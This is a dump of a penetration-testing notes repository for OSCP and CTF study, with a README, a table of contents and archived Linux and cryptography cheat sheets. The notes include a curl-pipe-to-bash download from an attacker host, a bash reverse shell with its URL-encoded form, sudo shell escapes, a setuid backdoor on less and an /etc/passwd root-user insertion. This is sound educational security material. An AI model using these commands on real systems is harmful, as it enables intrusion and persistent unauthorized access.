├── .gitbook └── assets │ └── 0_roztlgbulghhs2p_.png ├── CONTRIBUTING.md ├── Fundamentals ├── Computing │ └── README.md └── Networking │ └── README.md ├── README.md ├── SUMMARY.md ├── archive ├── linux.md ├── notes.md ├── os_agnostic.md └── windows.md ├── basic-enumeration.md ├── hackers-rest.md ├── hacking-methodology.md ├── hands-on-practice.md ├── linux-1 ├── hardening-and-setup.md ├── hardening-and-setup │ ├── README.md │ └── tmux-screen-cheatsheet.md ├── linux-hardening │ ├── README.md │ └── tmux-screen-cheatsheet.md ├── linux-redteam │ ├── README.md │ ├── enumeration.md │ ├── exfiltration.md │ ├── getting-access.md │ ├── persistance.md │ ├── pivoting-lateral-movement.md │ └── privilege-escalation.md ├── linux.md ├── linux │ ├── README.md │ ├── enumeration.md │ ├── getting-access.md │ ├── persistance.md │ └── privilege-escalation.md ├── unix-fundamentals.md └── vim.md ├── macos ├── hardening-and-configuration.md ├── macos-basics.md ├── macos-hardening.md ├── macos-redteam │ ├── README.md │ ├── enumeration.md │ ├── getting-access.md │ ├── persistence.md │ └── privilege-escalation.md └── red-team-notes │ ├── README.md │ ├── enumeration.md │ ├── getting-access.md │ ├── persistence.md │ └── privilege-escalation.md ├── mobile ├── android.md └── ios.md ├── os-agnostic ├── basic-enumeration.md ├── cryptography-and-encryption.md ├── network-hardware.md ├── os_agnostic.md ├── osint.md ├── password-cracking.md ├── password-cracking │ ├── README.md │ ├── cracking-the-hashes.md │ ├── gathering-the-hashes.md │ └── wordlist-manipulation.md ├── pivoting.md ├── pivoting │ ├── chisel.md │ ├── plink.exe.md │ ├── proxychains.md │ ├── socat.md │ ├── ssh.md │ └── sshuttle.md ├── reverse-engineering-and-binary-exploitation.md ├── reverse-engineering-and-binary-exploitation │ ├── README.md │ └── buffer-overflow.md ├── scripting.md ├── scripting │ ├── README.md │ └── script-language-comparison.md ├── sql.md ├── ssh-and-scp.md ├── steganography.md └── wifi.md ├── tools-cheatsheets ├── 
README.md └── cybersecurity-youtube-channels.md ├── untitled.md ├── web ├── burp-suite.md ├── dns.md └── web-notes │ ├── README.md │ ├── command-injection.md │ ├── enumeration.md │ ├── subdomain-virtual-host-enumeration.md │ ├── the-web-application-hackers-handbook.md │ └── web-filter-bypass.md └── windows-1 ├── active-directory.md ├── hardening-and-setup.md ├── powershell.md ├── windows-basics.md ├── windows-hardening.md └── windows-redteam ├── README.md ├── active-directory ├── README.md ├── enumeration.md ├── getting-access.md ├── persistence.md └── privilege-escalation.md ├── data-exfiltration.md ├── enumeration.md ├── getting-access.md ├── impacket.md ├── kerberos.md ├── persistence.md ├── pivoting-lateral-movement.md └── privilege-escalation.md /.gitbook/assets/0_roztlgbulghhs2p_.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zweilosec/Infosec-Notes/ddfbc153f5d11ab5dd5810ddd81271499935cde5/.gitbook/assets/0_roztlgbulghhs2p_.png -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | **If you would like to add to, modify, or improve anything in my notes, PLEASE DO!** 2 | 3 | If you would like to give suggestions or even commit changes to these pages feel free to head to my GitHub page at: 4 | 5 | {% embed url="https://github.com/zweilosec/Infosec-Notes" caption="" %} 6 | 7 | ### How to contribute 8 | 9 | 1. [Create an Issue Request](https://github.com/zweilosec/Infosec-Notes/issues) describing your changes/additions. 10 | 2. Fork [this repository](https://github.com/zweilosec/Infosec-Notes). 11 | 3. Push some code to your fork. 12 | 4. Come back to this repository and [open a pull request](https://github.com/zweilosec/Infosec-Notes/pulls). 13 | 5. After reviewing your changes, I will merge your pull request to the master repository. 14 | 6. 
Make sure to update your Issue Request so that I can credit you! Thank you so much! 15 | 16 | Feel free to also open an issue with any questions, help wanted, or requests! 17 | 18 | Throughout these notes I have put `TODO:` notes that indicate that I know a certain section needs work. Focus on these if you can! 19 | 20 | ```bash 21 | TODO: Change all code examples to use variables (e.g. $host_ip) 22 | rather than fill-in-the-blank format (e.g. ). 23 | This will help greatly with copying code directly into scripts. 24 | ``` 25 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | --- 2 | description: >- 3 | A collection of notes for Penetration Testers and Ethical Hackers. My journey 4 | to OSCP and beyond. 5 | --- 6 | 7 | # Hacker's Rest 8 | 9 | These are my publicly accessible notes from various sources for penetration testing, red-teaming, OSCP, Capture the Flag (CTF) challenges, and my [Vulnhub](https://www.vulnhub.com/)/ [Hack the Box](https://hackthebox.eu) machine [write-ups](https://zweilosec.github.io/). 10 | 11 | {% hint style="warning" %} 12 | Warning - These notes are largely unformatted right now. They are based on my way of learning things - by reading, doing, studying, exploring, and taking notes. Cleaning up and formatting comes later. 13 | 14 | * Do not assume anything from these notes. 15 | * Do not expect the notes to be exhaustive, or to cover the techniques or the output they produce in full. 16 | * Expect mistakes in the notes. 17 | * Feel free to ask questions! 18 | * Always consult additional resources. If possible I will try to link to outside resources. 
_If I have shared something of yours and you want credit, please let me know!_ 19 | {% endhint %} 20 | 21 | ## Contribution 22 | 23 | **If you would like to add to, modify, or improve anything in my notes, PLEASE DO!** 24 | 25 | If you would like to give suggestions or even commit changes to these pages feel free to head to my GitHub page at: 26 | 27 | {% embed url="https://github.com/zweilosec/Infosec-Notes" %} 28 | 29 | ### How to contribute 30 | 31 | 1. [Create an Issue Request](https://github.com/zweilosec/Infosec-Notes/issues) describing your changes/additions. 32 | 2. Fork [this repository](https://github.com/zweilosec/Infosec-Notes). 33 | 3. Push some code to your fork. 34 | 4. Come back to this repository and [open a pull request](https://github.com/zweilosec/Infosec-Notes/pulls). 35 | 5. After reviewing your changes, I will merge your pull request to the master repository. 36 | 6. Make sure to update your Issue Request so that I can credit you! Thank you so much! 37 | 38 | Feel free to also open an issue with any questions, help wanted, or requests! Throughout these notes I have put `TODO:` notes that indicate that I know a certain section needs work. Focus on these if you can! 39 | 40 | ```bash 41 | TODO: Change all code examples to use variables (e.g. $host_ip) 42 | rather than fill-in-the-blank format (e.g. ). 43 | This will help greatly with copying code directly into scripts. 44 | ``` 45 | 46 | ## Contents 47 | 48 | The following sub-pages of these notes will explore some of the common offensive and defensive security techniques including gaining shells, code execution, lateral movement, persistence, scripting, tools and much more. I also cover techniques for dealing with CTF-type challenges such as cryptography, reverse engineering, steganography and more. 49 | 50 | {% hint style="success" %} 51 | Hack Responsibly. 
52 | 53 | Always ensure you have **explicit** permission to access any computer system **before** using any of the techniques contained in these documents. You accept full responsibility for your actions by applying any knowledge gained here. 54 | {% endhint %} 55 | 56 | ### Linux 57 | 58 | * [Linux Basics](linux-1/unix-fundamentals.md) 59 | * [Hardening & Configuration Guide](linux-1/linux-hardening/) 60 | * [TMUX/Screen Cheatsheet](linux-1/linux-hardening/tmux-screen-cheatsheet.md) 61 | * [Red Team Notes](linux-1/linux-redteam/) 62 | * [Enumeration](linux-1/linux-redteam/enumeration.md) 63 | * [Getting Access](linux-1/linux-redteam/getting-access.md) 64 | * [Privilege Escalation](linux-1/linux-redteam/privilege-escalation.md) 65 | * [Exfiltration](linux-1/linux-redteam/exfiltration.md) 66 | * [Persistence](linux-1/linux-redteam/persistance.md) 67 | * [Vim](linux-1/vim.md) 68 | 69 | ### Windows 70 | 71 | * [Windows Basics](windows-1/windows-basics.md) 72 | * [Hardening & Configuration Guide](windows-1/windows-hardening.md) 73 | * [Red Team Notes](windows-1/windows-redteam/) 74 | * [Enumeration](windows-1/windows-redteam/enumeration.md) 75 | * [Getting Access](windows-1/windows-redteam/getting-access.md) 76 | * [Privilege Escalation](windows-1/windows-redteam/privilege-escalation.md) 77 | * [Persistence](windows-1/windows-redteam/persistence.md) 78 | * [Active Directory](windows-1/windows-redteam/active-directory/) 79 | * [PowerShell](windows-1/powershell.md) 80 | 81 | ### MacOS 82 | 83 | * [MacOS Basics](macos/macos-basics.md) 84 | * [Hardening & Configuration Guide](macos/macos-hardening.md) 85 | * [Red Team Notes](macos/macos-redteam/) 86 | * [Enumeration](macos/macos-redteam/enumeration.md) 87 | * [Getting Access](macos/macos-redteam/getting-access.md) 88 | * [Privilege Escalation](macos/macos-redteam/privilege-escalation.md) 89 | * [Persistence](macos/macos-redteam/persistence.md) 90 | 91 | ### Web 92 | 93 | * [DNS](web/dns.md) 94 | * [Subdomain/Virtual Host 
Enumeration](web/web-notes/subdomain-virtual-host-enumeration.md) 95 | * [Web Apps](web/web-notes/) 96 | * [Web Application Hacker's Handbook Task Checklist](web/web-notes/the-web-application-hackers-handbook.md) 97 | 98 | ### Mobile 99 | 100 | * [iOS](mobile/ios.md) 101 | * [Android](mobile/android.md) 102 | 103 | ### OS Agnostic 104 | 105 | * [Cryptography & Encryption](os-agnostic/cryptography-and-encryption.md) 106 | * [Network Hardware](os-agnostic/network-hardware.md) 107 | * [OS Agnostic](os-agnostic/os\_agnostic.md) 108 | * [OSINT](os-agnostic/osint.md) 109 | * [Password Cracking](os-agnostic/password-cracking/) 110 | * [Gathering the Hashes](os-agnostic/password-cracking/gathering-the-hashes.md) 111 | * [Wordlist Generation](os-agnostic/password-cracking/wordlist-manipulation.md) 112 | * [Cracking the Hashes](os-agnostic/password-cracking/cracking-the-hashes.md) 113 | * [Reverse Engineering & Binary Exploitation](os-agnostic/reverse-engineering-and-binary-exploitation/) 114 | * [Buffer Overflow](os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md) 115 | * [Scripting](os-agnostic/scripting/) 116 | * [Scripting Language Syntax Comparison](os-agnostic/scripting/script-language-comparison.md) 117 | * [SQL](os-agnostic/sql.md) 118 | * [SSH & SCP](os-agnostic/ssh-and-scp.md) 119 | * [Steganography](os-agnostic/steganography.md) 120 | * [Wireless](os-agnostic/wifi.md) 121 | 122 | ### Unsorted 123 | 124 | * [Unsorted Notes](untitled.md) 125 | 126 | ## OSCP/CTF Tools and Cheatsheets 127 | 128 | See my [list of outside sources](tools-cheatsheets/)! 129 | 130 | If you like this content and would like to see more, please consider [buying me a coffee](https://www.buymeacoffee.com/zweilosec)! 
131 | -------------------------------------------------------------------------------- /SUMMARY.md: -------------------------------------------------------------------------------- 1 | # Table of contents 2 | 3 | * [Hacker's Rest](README.md) 4 | * [Tools & Cheatsheets](tools-cheatsheets/README.md) 5 | * [Cybersecurity YouTube Channels](tools-cheatsheets/cybersecurity-youtube-channels.md) 6 | * [Hacking Methodology](hacking-methodology.md) 7 | * [Hands-on Practice](hands-on-practice.md) 8 | 9 | ## Fundamentals 10 | * [Network Fundamentals](Fundamentals/Networking/README.md) 11 | * [Computer Fundamentals](Fundamentals/Computing/README.md) 12 | 13 | ## Unix 14 | 15 | * [Unix Fundamentals](linux-1/unix-fundamentals.md) 16 | * [Hardening & Setup](linux-1/linux-hardening/README.md) 17 | * [TMUX/Screen Cheatsheet](linux-1/linux-hardening/tmux-screen-cheatsheet.md) 18 | * [Red Team Notes](linux-1/linux-redteam/README.md) 19 | * [Enumeration](linux-1/linux-redteam/enumeration.md) 20 | * [Getting Access](linux-1/linux-redteam/getting-access.md) 21 | * [Privilege Escalation](linux-1/linux-redteam/privilege-escalation.md) 22 | * [Pivoting/Lateral Movement](linux-1/linux-redteam/pivoting-lateral-movement.md) 23 | * [Data Exfiltration](linux-1/linux-redteam/exfiltration.md) 24 | * [Persistence](linux-1/linux-redteam/persistance.md) 25 | * [Vim](linux-1/vim.md) 26 | 27 | ## Windows 28 | 29 | * [Windows Fundamentals](windows-1/windows-basics.md) 30 | * [PowerShell](windows-1/powershell.md) 31 | * [Hardening & Setup](windows-1/windows-hardening.md) 32 | * [Red Team Notes](windows-1/windows-redteam/README.md) 33 | * [Enumeration](windows-1/windows-redteam/enumeration.md) 34 | * [Getting Access](windows-1/windows-redteam/getting-access.md) 35 | * [Privilege Escalation](windows-1/windows-redteam/privilege-escalation.md) 36 | * [Pivoting/Lateral Movement](windows-1/windows-redteam/pivoting-lateral-movement.md) 37 | * [Persistence](windows-1/windows-redteam/persistence.md) 38 | * [Data 
Exfiltration](windows-1/windows-redteam/data-exfiltration.md) 39 | * [Active Directory](windows-1/windows-redteam/active-directory/README.md) 40 | * [Enumeration](windows-1/windows-redteam/active-directory/enumeration.md) 41 | * [Getting Access](windows-1/windows-redteam/active-directory/getting-access.md) 42 | * [Privilege Escalation](windows-1/windows-redteam/active-directory/privilege-escalation.md) 43 | * [Persistence](windows-1/windows-redteam/active-directory/persistence.md) 44 | * [Kerberos](windows-1/windows-redteam/kerberos.md) 45 | * [Impacket](windows-1/windows-redteam/impacket.md) 46 | 47 | ## MacOS 48 | 49 | * [MacOS Basics](macos/macos-basics.md) 50 | * [Hardening & Configuration](macos/macos-hardening.md) 51 | * [Red Team Notes](macos/macos-redteam/README.md) 52 | * [Enumeration](macos/macos-redteam/enumeration.md) 53 | * [Getting Access](macos/macos-redteam/getting-access.md) 54 | * [Privilege Escalation](macos/macos-redteam/privilege-escalation.md) 55 | * [Persistence](macos/macos-redteam/persistence.md) 56 | 57 | ## Web 58 | 59 | * [Burp Suite](web/burp-suite.md) 60 | * [DNS](web/dns.md) 61 | * [Web Notes](web/web-notes/README.md) 62 | * [Enumeration](web/web-notes/enumeration.md) 63 | * [Web Filter Bypass](web/web-notes/web-filter-bypass.md) 64 | * [Command Injection](web/web-notes/command-injection.md) 65 | * [Subdomain/Virtual Host Enumeration](web/web-notes/subdomain-virtual-host-enumeration.md) 66 | * [The Web Application Hacker's Handbook](web/web-notes/the-web-application-hackers-handbook.md) 67 | 68 | ## Mobile 69 | 70 | * [iOS](mobile/ios.md) 71 | * [Android](mobile/android.md) 72 | 73 | ## OS Agnostic 74 | 75 | * [Basic Enumeration](os-agnostic/basic-enumeration.md) 76 | * [Cryptography & Encryption](os-agnostic/cryptography-and-encryption.md) 77 | * [Network Hardware](os-agnostic/network-hardware.md) 78 | * [OS Agnostic](os-agnostic/os\_agnostic.md) 79 | * [OSINT](os-agnostic/osint.md) 80 | * [Password 
Cracking](os-agnostic/password-cracking/README.md) 81 | * [Gathering the Hashes](os-agnostic/password-cracking/gathering-the-hashes.md) 82 | * [Wordlist Manipulation](os-agnostic/password-cracking/wordlist-manipulation.md) 83 | * [Cracking the Hashes](os-agnostic/password-cracking/cracking-the-hashes.md) 84 | * [Pivoting](os-agnostic/pivoting.md) 85 | * [Chisel](os-agnostic/pivoting/chisel.md) 86 | * [Plink.exe](os-agnostic/pivoting/plink.exe.md) 87 | * [SSH](os-agnostic/pivoting/ssh.md) 88 | * [Sshuttle](os-agnostic/pivoting/sshuttle.md) 89 | * [Socat](os-agnostic/pivoting/socat.md) 90 | * [Reverse Engineering & Binary Exploitation](os-agnostic/reverse-engineering-and-binary-exploitation/README.md) 91 | * [Buffer Overflow](os-agnostic/reverse-engineering-and-binary-exploitation/buffer-overflow.md) 92 | * [Scripting](os-agnostic/scripting/README.md) 93 | * [Script Language Syntax](os-agnostic/scripting/script-language-comparison.md) 94 | * [SQL](os-agnostic/sql.md) 95 | * [SSH & SCP](os-agnostic/ssh-and-scp.md) 96 | * [Steganography](os-agnostic/steganography.md) 97 | * [Wireless](os-agnostic/wifi.md) 98 | 99 | *** 100 | 101 | * [Unsorted](untitled.md) 102 | -------------------------------------------------------------------------------- /archive/linux.md: -------------------------------------------------------------------------------- 1 | # Linux 2 | 3 | ## Linux 4 | 5 | Website for finding ways to get a shell (or read/write files) out of everyday programs such as `vi`, the "living off the land binaries": [GTFObins](https://gtfobins.github.io/) 6 | 7 | ### Enumeration 8 | 9 | find files owned by a given user (`-user`; swap in `-writable` to list what the current user can modify): 10 | 11 | ```bash 12 | find / -user $user -ls 2>/dev/null 13 | ``` 14 | `which awk perl python ruby gcc cc vi vim nmap find netcat nc wget tftp ftp 2>/dev/null` - Check which of these useful programs are installed on the machine 15 | 16 | [Linux Privilege Checker](https://github.com/sleventyeleven/linuxprivchecker/blob/master/linuxprivchecker.py) 17 | 18 | full linux enumeration: 19 | 20 | * 
[LinEnum.sh](https://github.com/rebootuser/LinEnum) 21 | * [LinPEAS.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS) 22 | 23 | download **and** execute a script \(such as LinEnum.sh\) \[from a remote host\] without writing it to disk: `curl -s http://$attacker_ip/LinEnum.sh | bash` 24 | 25 | Locate exploits: 26 | 27 | ```bash 28 | searchsploit $search_term 29 | 30 | #to view the exploit code (-m copies it into the current directory instead): 31 | searchsploit -x $exploit_path 32 | ``` 33 | 34 | enumerate running processes, including other users' cron jobs, without needing root: `pspy` 35 | 36 | `ps -U root -u root ux` View all processes started by a certain user (root in this case) 37 | 38 | enumeration multi-tool: [Sparta](https://sparta.secforce.com/) \(does nmap, hydra, nikto, sqlscan, ssl...\) 39 | 40 | Semi-automated enumeration all-in-one (use this!): [nmapAutomator](https://github.com/21y4d/nmapAutomator) 41 | 42 | Unix hardening tool that can be used for enumeration: [Bastille](http://bastille-linux.sourceforge.net/) 43 | 44 | enumerate info about the process that reads it (e.g. the web server's UID when included through an LFI): `/proc/self/status` 45 | 46 | common Local File Inclusion locations: [https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI](https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI) 47 | 48 | ### Upgrade shells: 49 | 50 | ```text 51 | 1. python -c 'import pty; pty.spawn("/bin/sh")' 52 | 2. perl -e 'exec "/bin/sh";' 53 | 3. 
ruby -e 'exec "/bin/sh"' 54 | ``` 55 | To upgrade to a fully interactive shell (python example): 56 | ```bash 57 | python -c 'import pty;pty.spawn("/bin/bash")' 58 | # press ctrl-z to background the shell, then on your local terminal: 59 | stty raw -echo; fg 60 | # the shell is back in the foreground; tell it what terminal it has: 61 | export TERM=xterm 62 | ``` 63 | 64 | php shell: `` 65 | 66 | bash reverse shell: 67 | 68 | ```text 69 | bash -i >& /dev/tcp/10.10.14.148/9001 0>&1 70 | 71 | #URL encoded: 72 | bash+-i+>%26+/dev/tcp/10.10.14.148/9001+0>%261 73 | ``` 74 | 75 | nc listener: `nc -lvnp $port` 76 | 77 | ### TMUX 78 | 79 | tmux keeps sessions alive if you lose your ssh connection (reattach with `tmux attach -t $session_name`), can split panes and more: 80 | 81 | ```text 82 | tmux new -s $session_name 83 | ctrl-b = prefix key (enables addnl commands) 84 | +[%] vertical pane 85 | +["] horizontal pane 86 | +[alt-space] cycle through pane layouts (horizontal <-> vertical) 87 | +[arrow_keys] move between panes 88 | +[z] zoom in/out on pane 89 | +[?] help for tmux 90 | +[t] clock 91 | ``` 92 | 93 | tmux plugins: 94 | 95 | * tmux logging plugin \(get this!!\) can save a log of tmux windows 96 | * [better mouse mode](https://github.com/NHDaly/tmux-better-mouse-mode) 97 | 98 | ### Privilege Escalation 99 | 100 | [https://payatu.com/guide-linux-privilege-escalation](https://payatu.com/guide-linux-privilege-escalation) 101 | 102 | execute a command as another user via `sudo`: `sudo -u $user $command` 103 | 104 | list user's sudo permissions: `sudo -l` 105 | 106 | execute any command while in `less`: `!$command` 107 | 108 | Root backdoor by setting the setuid bit on `/bin/less` (you must already be root to do this, so it is persistence rather than escalation): `chmod 4755 /bin/less`, then later `less /etc/shadow` or `!bash -p` from inside `less` (`-p` stops bash dropping the elevated effective UID) 109 | 110 | Privilege Escalation to Root with `find`: `sudo find /etc -exec sh -i \; -quit` 111 | 112 | wildcard injection: \[NEED MORE HERE\] 113 | 114 | awk shell escape (if `awk`/`mawk` can be run through `sudo`): 115 | 116 | ```bash 117 | mawk 'BEGIN {system("/bin/sh")}' 118 | ``` 119 | 120 | If your user can `sudo` any of these text editors/pagers: 121 | ```bash 122 | 1. [user@localhost]$ sudo vi 123 | 2. :shell 124 | 3. [root@localhost]# 125 | 126 | 1. [user@localhost]$ sudo less file.txt 127 | 2. !bash 128 | 3. 
[root@localhost]# 129 | 130 | 1. [user@localhost]$ sudo more long_file.txt 131 | 2. !bash 132 | 3. [root@localhost]# 133 | Note: for the `more` method to work, the file being read has to be longer than one page, otherwise `more` exits before you can type the command 134 | ``` 135 | ### Remote Code Execution 136 | 137 | https://www.cyberciti.biz/faq/linux-unix-osx-bsd-ssh-run-command-on-remote-machine-server/ 138 | Run commands on a remote system without an interactive shell by feeding SSH a here-document (quote the delimiter, `<< 'HERE'`, if the commands contain `$variables` that must be expanded remotely rather than by your local shell): 139 | ```bash 140 | ssh server1 << HERE 141 | command1 142 | command2 143 | HERE 144 | ``` 145 | 146 | ### Misc Linux 147 | 148 | RAM-backed tmpfs, so nothing lands on disk (it is still listable by other users and is gone on reboot): `/dev/shm/` 149 | 150 | list all running commands: 151 | 152 | ```bash 153 | ps -eo command 154 | # change the word delimiter to \n instead of whitespace (loop by line): 155 | IFS=$'\n' 156 | # then loop through each line of the output: 157 | for i in $(ps -eo command); do echo "$i"; done 158 | unset IFS  # restore the default delimiter afterwards 159 | ``` 160 | 161 | https://unix.stackexchange.com/questions/211817/copy-the-contents-of-a-file-into-the-clipboard-without-displaying-its-contents 162 | script to copy the contents of a file directly to the clipboard; save it somewhere in your PATH, then enjoy! 163 | ```bash 164 | #! /bin/bash 165 | xclip -selection clipboard -i "$@" 166 | ``` 167 | 168 | 'new' netstat: `ss -lnp | grep 9001` \#check for a listener on port 9001 (`-l` shows listening sockets only; use `ss -tnp | grep 9001` to see established connections) 169 | 170 | copy files to the local machine without a file transfer channel: 171 | 172 | ```bash 173 | base64 -w 0 /path/of/file/name.file 174 | #copy the base64 output, then on the other machine: 175 | echo -n "$base64_string" | base64 -d > filename.file 176 | #check the copy is intact by comparing checksums on both sides: 177 | sha256sum /path/of/file/name.file   # vs. sha256sum filename.file 178 | ``` 179 | 180 | pretty print JSON text in the console (https://www.howtogeek.com/529219/how-to-parse-json-files-on-the-linux-command-line-with-jq/). Pipe the JSON output to `jq`. Example from the NASA ISS API: `curl -s http://api.open-notify.org/iss-now.json | jq` 181 | 182 | web application fuzzer: [wfuzz](https://github.com/xmendez/wfuzz) 183 | 184 | convert rpm to debian packages: `alien $package.rpm` 185 | 186 | `sudo rm --force $(which -a $program)` Remove every copy of a program found on the PATH (`which -a` lists all matches; plain `which` returns only the first). Could be used with `find` instead of `which`. 
dangerous with --force!! 187 | 188 | cycle through previous arguments: `alt-.` 189 | 190 | move between "words" on a command line: `ctrl-[arrow_keys]` 191 | 192 | 193 | ### PATH 194 | 195 | Add new $PATHs to `.profile` rather than `.bashrc`, then `source ~/.profile` to use the new PATHs 196 | 197 | Makes the current directory part of the path so you don't need `./` * NOT RECOMMENDED for home use: any directory you `cd` into can then shadow system commands * `export PATH=.:$PATH` 198 | 199 | The bullet-proof way to add a path (e.g., ~/opt/bin) to the PATH environment variable is below. The `${PATH:+...}` form avoids leaving an empty entry (which means "current directory") when PATH was unset, and `$HOME` is used because `~` does not expand inside double quotes: 200 | (from https://unix.stackexchange.com/questions/26047/how-to-correctly-add-a-path-to-path) 201 | ```bash 202 | PATH="${PATH:+${PATH}:}$HOME/opt/bin"   # append  (instead of PATH="$PATH:$HOME/opt/bin") 203 | 204 | PATH="$HOME/opt/bin${PATH:+:${PATH}}"   # prepend (instead of PATH="$HOME/opt/bin:$PATH") 205 | ``` 206 | -------------------------------------------------------------------------------- /archive/os_agnostic.md: -------------------------------------------------------------------------------- 1 | # OS Agnostic 2 | 3 | ## Encryption/Decryption 4 | 5 | [CyberChef](https://gchq.github.io/CyberChef/): Website for encryption/decryption of many different types at the same time 6 | 7 | good cipher tools: [http://rumkin.com/](http://rumkin.com/) 8 | 9 | one time pad: `key = pt XOR ct` for an XOR pad (for a modular-addition pad, `key = ct - pt mod 26`), so a known plaintext/ciphertext pair reveals the key 10 | 11 | decrypt data with an RSA private key: `openssl pkeyutl -decrypt -inkey $private_key.pem -in $ciphertext.bin` (`openssl rsautl -decrypt ...` still works but is deprecated in OpenSSL 3) 12 | 13 | * [Ippsec:HacktheBox - Charon](https://www.youtube.com/watch?v=_csbKuOlmdE) 14 | 15 | `hydra -e nsr` - additional checks, "n" for null password, "s" try login as pass, "r" try the reverse login as pass 16 | 17 | crack a password with a known format (mask attack): 18 | 19 | ```bash 20 | # -m 1600 = hash type (1600 is Apache apr1 MD5; look the mode up per hash), -a 3 = mask attack, 21 | # -1 defines custom charset 1, each ?1 = one char from that set (8 chars here), -O = optimized kernels (limits max length) 22 | hashcat -m 1600 -a 3 -O -1 $charset $hash_file ?1?1?1?1?1?1?1?1 23 | # --force only silences warnings (e.g. about drivers); leave it off unless you know why it is needed 24 | ``` 25 | 26 | create a wordlist with a known character set & length: 27 | 28 | ```bash 29 | crunch 8 8 $charset -o wordlist.txt   # min length, max length, charset 30 | ``` 31 | 32 | get hash formats for [hashcat](https://hashcat.net/wiki/doku.php?id=example_hashes) 
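Added example, not from these notes and not hashcat's own code: a small mask-attack engine that expands hashcat's `?1`/`?d`-style masks (the `-1 $charset ... ?1?1?1?1` syntax above, and the equivalent of `crunch 8 8 $charset`, which is simply `?1` repeated eight times) into a candidate space, hashes each candidate and stops at the first match. The custom charsets, the `cab2024` password and its SHA-256 digest are constructed for the demo; a real job would use hashcat with the `-m` mode matching the dumped hash type.

```python
"""Mask-attack candidate generation in hashcat's ?1 / ?d notation.

Constructed example for these notes: expands a mask such as ?1?1?1?2?2?2?2
into the candidate space that `hashcat -a 3 -1 <set1> -2 <set2> <hash> <mask>`
walks, hashes each candidate and returns the first match.
"""
import hashlib
import itertools
from typing import Dict, Iterator, List, Optional

# hashcat's built-in charsets: ?l lower, ?u upper, ?d digits, ?s specials, ?a all four
BUILTIN: Dict[str, str] = {
    "l": "abcdefghijklmnopqrstuvwxyz",
    "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ",
    "d": "0123456789",
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]


def parse_mask(mask: str, custom: Dict[str, str]) -> List[str]:
    """Return one charset per output position.

    ?1..?4 come from `custom` (hashcat's -1 .. -4), ?l/?u/?d/?s/?a from BUILTIN,
    ?? is a literal '?', and any other character is a literal (single-element set).
    """
    positions: List[str] = []
    i = 0
    while i < len(mask):
        if mask[i] != "?":
            positions.append(mask[i])
            i += 1
            continue
        if i + 1 >= len(mask):
            raise ValueError("mask ends with a dangling '?'")
        key = mask[i + 1]
        if key == "?":
            positions.append("?")
        elif key in custom:
            positions.append(custom[key])
        elif key in BUILTIN:
            positions.append(BUILTIN[key])
        else:
            raise ValueError(f"unknown charset ?{key}")
        i += 2
    return positions


def keyspace(mask: str, custom: Dict[str, str]) -> int:
    """Number of candidates the mask expands to (product of the charset sizes)."""
    total = 1
    for charset in parse_mask(mask, custom):
        total *= len(charset)
    return total


def candidates(mask: str, custom: Dict[str, str]) -> Iterator[str]:
    """Yield every candidate, rightmost position varying fastest."""
    for combo in itertools.product(*parse_mask(mask, custom)):
        yield "".join(combo)


def crack(target_hex: str, mask: str, custom: Dict[str, str], algo: str = "sha256") -> Optional[str]:
    """Brute-force the mask against one hex digest; None if the mask never hits."""
    target_hex = target_hex.lower()
    for cand in candidates(mask, custom):
        if hashlib.new(algo, cand.encode()).hexdigest() == target_hex:
            return cand
    return None


# Constructed demo: the password is known to be 3 letters from {a,b,c} followed by 4 digits.
CUSTOM = {"1": "abc", "2": "0123456789"}
DEMO_MASK = "?1?1?1?2?2?2?2"
DEMO_PASSWORD = "cab2024"  # made up for the demo
DEMO_HASH = hashlib.sha256(DEMO_PASSWORD.encode()).hexdigest()

if __name__ == "__main__":
    print(f"keyspace for {DEMO_MASK}: {keyspace(DEMO_MASK, CUSTOM)}")
    print("recovered:", crack(DEMO_HASH, DEMO_MASK, CUSTOM))
```

The point of checking `keyspace()` before running is the same as reading hashcat's "progress" line: a mask that fixes the format (3 letters from a 3-character set, then 4 digits) is 270,000 candidates, whereas `?a` for all seven positions would be 95^7, so the more you know about the password policy the cheaper the attack.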
31 | 32 | [Jumbo John](https://github.com/magnumripper/JohnTheRipper) 33 | 34 | generate a password hash for insertion into /etc/passwd: 35 | 36 | ```bash 37 | openssl passwd -1 -salt $salt $password   # -1 = MD5-crypt ($1$...), accepted directly in the password field 38 | $user:$hash:0:0:root:/root:/bin/bash      # add a line like this to /etc/passwd (uid 0 = root) 39 | ``` 40 | 41 | [Hashes.org](https://hashes.org/): large database of pre-cracked hashes 42 | 43 | Many password lists to download at [skullsecurity](https://wiki.skullsecurity.org/Passwords) 44 | 45 | ## Binary Exploitation 46 | 47 | gdb plugins for exploit development: peda.py / pwndbg \[`pattern create ###` (peda) or `cyclic ###` (pwndbg) builds a cyclic pattern so the offset that overwrites the saved return address can be read off the crash\] 48 | 49 | ASLR Bypass/binary exploit/gdb: 50 | 51 | * [Ippsec:HackTheBox - October](https://www.youtube.com/watch?v=K05mJazHhF4) 52 | * [Ippsec:Camp CTF - Bitterman](https://www.youtube.com/watch?v=6S4A2nhHdWg) 53 | * [pwnTools](https://github.com/Gallopsled/pwntools) - [documentation](http://docs.pwntools.com/en/stable/) 54 | * [Binary Ninja](https://binary.ninja/) 55 | 56 | [Packetstorm](https://packetstormsecurity.com/) /bin/sh shellcode 57 | 58 | simple binary exploitation [Ippsec:HacktheBox - Sneaky](https://www.youtube.com/watch?v=1UGxjqTnuyo) 59 | 60 | [protostar ctf](https://exploit-exercises.com/protostar/) for getting into binary exploitation 61 | 62 | ## HTTP 63 | 64 | in order to proxy tools that have no proxy option: create a Burp proxy listener on 127.0.0.1:80 and point the tool at localhost [Ippsec:HacktheBox - Granny & Grandpa](https://www.youtube.com/watch?v=ZfPVGJGkORQ) 65 | 66 | vulnerability testing for webdav \(or other file upload vulns!\): `davtest` 67 | 68 | bypassing filetype filters with the http MOVE method to rename an allowed filetype [Ippsec:HacktheBox - Granny & 